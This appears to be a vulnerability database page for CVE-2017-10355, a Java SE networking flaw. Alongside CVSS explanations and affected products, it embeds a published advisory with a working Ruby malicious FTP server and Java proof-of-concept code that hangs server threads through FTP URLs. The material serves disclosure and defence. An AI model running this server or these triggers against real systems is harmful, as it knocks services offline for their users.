CVE-2017-10355 : Detail

CVE-2017-10355

5.3
/
Medium
0.93%V3
Network
2017-10-19
15h00 +00:00
2024-10-04
16h48 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Networking). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144; JRockit: R28.3.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE Other No informations.

Metrics

Metrics Score Severity CVSS Vector Source
V3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Network

The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).

Attack Complexity

This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.

User Interaction

This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

Scope

Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs.

Unchanged

An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

Base: Impact Metrics

The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

None

There is no loss of confidentiality within the impacted component.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

None

There is no loss of integrity within the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

Low

Performance is reduced or there are interruptions in resource availability. Even if repeated exploitation of the vulnerability is possible, the attacker does not have the ability to completely deny service to legitimate users. The resources in the impacted component are either partially available all of the time, or fully available only some of the time, but overall there is no direct, serious consequence to the impacted component.

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.

Environmental Metrics

These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.

 [email protected]
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 44057

Publication date : 2017-08-29 22h00 +00:00
Author : SecuriTeam
EDB Verified : No

## Vulnerabilities Summary The following advisory describes two (2) vulnerabilities found in Oracle Java JDK/JRE (1.8.0.131 and previous versions) packages and Apache Xerces (2.11.0) The vulnerabilities are: Oracle JDK/JRE Concurrency-Related Denial of Service java.net.URLConnection (with no setConnectTimeout) Concurrency-Related Denial of Service ## Credit An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program ## Vendor response Update 1: Oracle has released patches to address this vulnerability and assigned CVE-2017-10355 Oracle acknowledged receiving the report, and has assigned it a tracking number: S0876966. We have no further information on patch availability or a workaround. ## Vulnerabilities Details These two vulnerabilities can be triggered to cause a Denial of Service against a server, under the following conditions: An attacker can pass an URL parameter that points to a controlled FTP server to the target Target server uses vulnerable component(s) to fetch the resource specified by the attacker Target server does not prevent fetching of FTP URI resources In both vulnerabilities, the attack sequence is the following: Attacker forces vulnerable target server to parse an FTP URL which points to an attacker’s controlled FTP server Target server fetches FTP resource provided by attacker Attacker’s FTP server abruptly exits, leaving the Java process on target server with two internal threads in an infinite waiting status If the Java process is single-threaded, then it cannot further process any other client requests, reaching a Denial of Service condition with only one request from the attacker In case of a multi-threading process, then it is possible to use the same technique and reach a Denial of Service condition of all available threads, by issuing one request for each available thread The attacker’s controlled FTP server has to “abruptly” exit when the Java client will perform a RETR FTP command. This behavior is not properly handled and causes a thread concurrency Denial of Service. For example: require 'socket' ftp_server = TCPServer.new 21 Thread.start do loop do Thread.start(ftp_server.accept) do |ftp_client| puts "FTP. New client connected" ftp_client.puts("220 ftp-server") counter = 0 loop { req = ftp_client.gets() break if req.nil? puts "< "+req if req.include? "USER" ftp_client.puts("331 password") else ftp_client.puts("230 Waiting data") counter = counter + 1 if counter == 6 abort end end } puts "Aborted..." end end end loop do sleep(50000) end 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 require 'socket' ftp_server = TCPServer.new 21 Thread.start do loop do Thread.start(ftp_server.accept) do |ftp_client| puts "FTP. New client connected" ftp_client.puts("220 ftp-server") counter = 0 loop { req = ftp_client.gets() break if req.nil? puts "< "+req if req.include? "USER" ftp_client.puts("331 password") else ftp_client.puts("230 Waiting data") counter = counter + 1 if counter == 6 abort end end } puts "Aborted..." end end end loop do sleep(50000) end When triggered, the DoS will result in a CLOSE_WAIT status on the connection between the target server and the FTP server (192.168.234.134), leaving the Java process thread stuck. Oracle JDK/JRE Concurrency-Related Denial of Service The vulnerable functions are: java.io.InputStream java.xml.ws.Service javax.xml.validation.Schema javax.xml.JAXBContext java.net.JarURLConnection – The setConnectionTimeout and setReadTimeout are ignored javax.imageio.ImageIO Javax.swing.ImageIcon javax.swing.text.html.StyleSheet ## java.io.InputStream Proof of Concept ``` import java.io.InputStream; import java.net.URL; public class RandomAccess { public static void main(String[] args) { try { //url = new URL ("ftp://maliciousftp:2121/test.xml"); URL url = new URL("ftp://maliciousftp:2121/test.xml"); InputStream inputStream = url.openStream(); inputStream.read(); //urlc.setReadTimeout(5000); //urlc.setConnectTimeout(5000); // <- this fixes the bug } catch (Exception e) { e.printStackTrace(); } } } ``` ## javax.xml.ws.Service Proof of Concept ``` import java.net.MalformedURLException; import java.net.URL; import javax.xml.namespace.QName; import javax.xml.ws.Service; public class CreateService { public static void main(String[] args) { String wsdlURL = "ftp://maliciousftp:2121/test?wsdl"; String namespace = "http://foo.bar.com/webservice"; String serviceName = "SomeService"; QName serviceQN = new QName(namespace, serviceName); try { Service service = Service.create(new URL(wsdlURL), serviceQN); } catch (MalformedURLException e) { e.printStackTrace(); } } } ``` ## javax.xml.validation.Schema Proof of Concept ``` import java.net.MalformedURLException; import java.net.URL; import javax.xml.validation.Schema; import javax.xml.validation.SchemaFactory; import org.xml.sax.SAXException; public class NSchema { public static void main(String[] args) { SchemaFactory schemaFactory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema"); URL url; try { url = new URL("ftp://maliciousftp:2121/schema"); try { Schema schemaGrammar = schemaFactory.newSchema(url); } catch (SAXException e) { e.printStackTrace(); } } catch (MalformedURLException e) { e.printStackTrace(); } } } ``` ## javax.xml.JAXBContext Proof of Concept ``` import java.net.MalformedURLException; import java.net.URL; import javax.xml.bind.JAXBContext; import javax.xml.bind.JAXBException; import javax.xml.bind.Unmarshaller; public class UnMarsh { public static void main(String[] args) { JAXBContext jaxbContext = null; try { jaxbContext = JAXBContext.newInstance(); } catch (JAXBException e) { e.printStackTrace(); } URL url = null; try { url = new URL("ftp://maliciousftp:2121/test"); } catch (MalformedURLException e) { e.printStackTrace(); } Unmarshaller jaxbUnmarshaller = null; try { jaxbUnmarshaller = jaxbContext.createUnmarshaller(); } catch (JAXBException e) { e.printStackTrace(); } try { Object test = jaxbUnmarshaller.unmarshal(url); } catch (JAXBException e) { e.printStackTrace(); } } } ``` ## java.net.JarURLConnection Proof of Concept ``` import java.io.IOException; import java.net.JarURLConnection; import java.net.MalformedURLException; import java.net.URL; import java.util.jar.Manifest; public class JavaUrl { public static void main(String[] args) { URL url = null; try { url = new URL("jar:ftp://maliciousftp:2121/duke.jar!/"); } catch (MalformedURLException e) { e.printStackTrace(); } JarURLConnection jarConnection = null; try { jarConnection = (JarURLConnection) url.openConnection(); jarConnection.setConnectTimeout(5000); jarConnection.setReadTimeout(5000); } catch (IOException e1) { e1.printStackTrace(); } try { Manifest manifest = jarConnection.getManifest(); } catch (IOException e) { e.printStackTrace(); } } } ``` ## javax.imageio.ImageIO Proof of Concept ``` import java.awt.Image; import java.io.IOException; import java.net.URL; import javax.imageio.ImageIO; import javax.swing.ImageIcon; import javax.swing.JFrame; import javax.swing.JLabel; public class ImageReader { public static void main(String[] args) { Image image = null; try { URL url = new URL("ftp://maliciousftp:2121/test.jpg"); image = ImageIO.read(url); } catch (IOException e) { e.printStackTrace(); } JFrame frame = new JFrame(); frame.setSize(300, 300); JLabel label = new JLabel(new ImageIcon(image)); frame.add(label); frame.setVisible(true); } } ``` ## javax.swing.ImageIcon Proof of Concept ``` import java.net.MalformedURLException; import java.net.URL; import javax.swing.ImageIcon; public class ImageXcon { public static void main(String[] args) { URL imgURL; try { imgURL = new URL("ftp://maliciousftp:2121/test"); String description = ""; ImageIcon icon = new ImageIcon(imgURL, description); } catch (MalformedURLException e) { e.printStackTrace(); } } } ``` ## javax.swing.text.html.StyleSheet Proof of Concept ``` import java.net.MalformedURLException; import java.net.URL; import javax.swing.text.html.StyleSheet; public class ImportStyla { public static void main(String[] args) { StyleSheet cs = new StyleSheet(); URL url; try { url = new URL("ftp://maliciousftp:2121/test"); cs.importStyleSheet(url); } catch (MalformedURLException e) { e.printStackTrace(); } } } ``` ## java.net.URLConnection – Concurrency-Related Denial of Service A Thread Concurrency Denial of Service condition exists when java.net.URLConnection is used to fetch a file from an FTP server without specifying a Connection Timeout value. The vulnerable functions are: javax.xml.parsers.SAXParser javax.xml.parsers.SAXParserFactory org.dom4j.Document org.dom4j.io.SAXReader javax.xml.parsers.DocumentBuilder javax.xml.parsers.DocumentBuilderFactory The Root Cause Issue in Apache Xerces is the com.sun.org.apache.xerces.internal.impl.XMLEntityManager.class In this case, XMLEntityManager.class does not explicitly set Connection Timeout for the connect object, letting Java to set a default value of -1, leading to a Denial of Service condition, as explained below. Example of code using Apache Xerces library to fetch an XML file from an FTP server: ``` [snip] private void parseXmlFile() { //get the factory DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); try { //Using factory get an instance of document builder DocumentBuilder db = dbf.newDocumentBuilder(); //parse using builder to get DOM representation of the XML file dom = db.parse("ftp://maliciousftpserver/test.xml"); & lt; - FTP URL controlled by the attacker } catch (ParserConfigurationException pce) { pce.printStackTrace(); } catch (SAXException se) { se.printStackTrace(); } catch (IOException ioe) { ioe.printStackTrace(); } } [snip] ``` ## SAXParser Proof of Concept ``` SAXParserFactory factory = SAXParserFactory.newInstance(); SAXParser saxParser = factory.newSAXParser(); UserHandler userhandler = new UserHandler(); saxParser.parse("ftp://badftpserver:2121/whatever.xml”) ``` ## DOM4J / SAXReader Proof of Concept ``` SAXReader reader = new SAXReader(); Document document = reader.read( "ftp://badftpserver:2121/whatever.xml" ); ``` ## JAVAX XML Parsers Proof of Concept ``` DocumentBuilder db = dbf.newDocumentBuilder(); dom = db.parse("ftp://badftpserver:2121/whatever.xml"); ```

Products Mentioned

Configuraton 0

Oracle>>Jdk >> Version 1.6.0

Oracle>>Jdk >> Version 1.7.0

Oracle>>Jdk >> Version 1.8.0

Oracle>>Jdk >> Version 1.9.0

Oracle>>Jre >> Version 1.6.0

Oracle>>Jre >> Version 1.7.0

Oracle>>Jre >> Version 1.8.0

Oracle>>Jre >> Version 1.9.0

Oracle>>Jrockit >> Version r28.3.15

Configuraton 0

Redhat>>Satellite >> Version 5.8

Redhat>>Enterprise_linux_desktop >> Version 6.0

Redhat>>Enterprise_linux_desktop >> Version 7.0

Redhat>>Enterprise_linux_eus >> Version 7.4

Redhat>>Enterprise_linux_eus >> Version 7.5

Redhat>>Enterprise_linux_eus >> Version 7.6

Redhat>>Enterprise_linux_eus >> Version 7.7

Redhat>>Enterprise_linux_server >> Version 6.0

Redhat>>Enterprise_linux_server >> Version 7.0

Redhat>>Enterprise_linux_server_aus >> Version 7.4

Redhat>>Enterprise_linux_server_aus >> Version 7.6

Redhat>>Enterprise_linux_server_aus >> Version 7.7

Redhat>>Enterprise_linux_server_tus >> Version 7.4

Redhat>>Enterprise_linux_server_tus >> Version 7.6

Redhat>>Enterprise_linux_server_tus >> Version 7.7

Redhat>>Enterprise_linux_workstation >> Version 6.0

Redhat>>Enterprise_linux_workstation >> Version 7.0

Configuraton 0

Netapp>>Active_iq_unified_manager >> Version From (including) 7.3

Netapp>>Active_iq_unified_manager >> Version From (including) 9.5

Netapp>>Cloud_backup >> Version -

Netapp>>E-series_santricity_management_plug-ins >> Version -

Netapp>>E-series_santricity_os_controller >> Version From (including) 11.0 To (including) 11.70.1

Netapp>>E-series_santricity_storage_manager >> Version -

Netapp>>E-series_santricity_web_services >> Version -

Netapp>>Element_software >> Version -

Netapp>>Oncommand_balance >> Version -

Netapp>>Oncommand_insight >> Version -

Netapp>>Oncommand_performance_manager >> Version -

Netapp>>Oncommand_shift >> Version -

Netapp>>Oncommand_unified_manager >> Version To (including) 7.1

Netapp>>Oncommand_unified_manager >> Version To (including) 7.1

Netapp>>Oncommand_unified_manager >> Version -

Netapp>>Oncommand_workflow_automation >> Version -

Netapp>>Plug-in_for_symantec_netbackup >> Version -

Netapp>>Snapmanager >> Version -

Netapp>>Snapmanager >> Version -

Netapp>>Steelstore_cloud_integrated_storage >> Version -

Netapp>>Storage_replication_adapter_for_clustered_data_ontap >> Version From (including) 7.2

  • Netapp>>Storage_replication_adapter_for_clustered_data_ontap >> Version 9.6 (Open CPE detail)
  • Netapp>>Storage_replication_adapter_for_clustered_data_ontap >> Version 9.7 (Open CPE detail)

Netapp>>Storage_replication_adapter_for_clustered_data_ontap >> Version From (including) 7.2

  • Netapp>>Storage_replication_adapter_for_clustered_data_ontap >> Version 7.2 (Open CPE detail)

Netapp>>Vasa_provider_for_clustered_data_ontap >> Version From (including) 7.2

Netapp>>Vasa_provider_for_clustered_data_ontap >> Version 6.0

Netapp>>Virtual_storage_console >> Version From (including) 7.2

Netapp>>Virtual_storage_console >> Version 6.0

Configuraton 0

Debian>>Debian_linux >> Version 7.0

Debian>>Debian_linux >> Version 8.0

Debian>>Debian_linux >> Version 9.0

References

https://access.redhat.com/errata/RHSA-2017:3047
Tags : vendor-advisory, x_refsource_REDHAT
https://security.gentoo.org/glsa/201711-14
Tags : vendor-advisory, x_refsource_GENTOO
https://www.debian.org/security/2017/dsa-4015
Tags : vendor-advisory, x_refsource_DEBIAN
https://access.redhat.com/errata/RHSA-2017:3267
Tags : vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2017:2998
Tags : vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2017:3268
Tags : vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2017:3046
Tags : vendor-advisory, x_refsource_REDHAT
http://www.securitytracker.com/id/1039596
Tags : vdb-entry, x_refsource_SECTRACK
https://security.gentoo.org/glsa/201710-31
Tags : vendor-advisory, x_refsource_GENTOO
https://access.redhat.com/errata/RHSA-2017:3264
Tags : vendor-advisory, x_refsource_REDHAT
https://www.debian.org/security/2017/dsa-4048
Tags : vendor-advisory, x_refsource_DEBIAN
https://access.redhat.com/errata/RHSA-2017:3453
Tags : vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2017:3392
Tags : vendor-advisory, x_refsource_REDHAT
http://www.securityfocus.com/bid/101369
Tags : vdb-entry, x_refsource_BID
https://access.redhat.com/errata/RHSA-2017:2999
Tags : vendor-advisory, x_refsource_REDHAT